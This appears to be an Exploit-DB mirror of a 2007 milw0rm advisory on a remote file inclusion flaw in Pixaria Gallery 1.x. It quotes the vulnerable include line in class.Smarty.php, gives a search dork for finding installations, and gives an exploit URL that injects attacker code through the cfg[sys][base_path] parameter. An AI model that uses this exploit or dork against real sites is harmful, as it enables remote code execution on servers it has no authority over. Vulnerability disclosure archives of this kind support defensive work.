exploit-db-mirror/platforms/php/webapps/3733.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

20 lines
843 B
Text
Executable file

Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# scripts : Pixaria Gallery 1.x
# Discovered By : irvian
# scripts site : http://pixaria.com/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork : powered by Pixaria. Gallery
------------------------------------------------------------------------------------------
bug found:
/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");
Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]
# milw0rm.com [2007-04-14]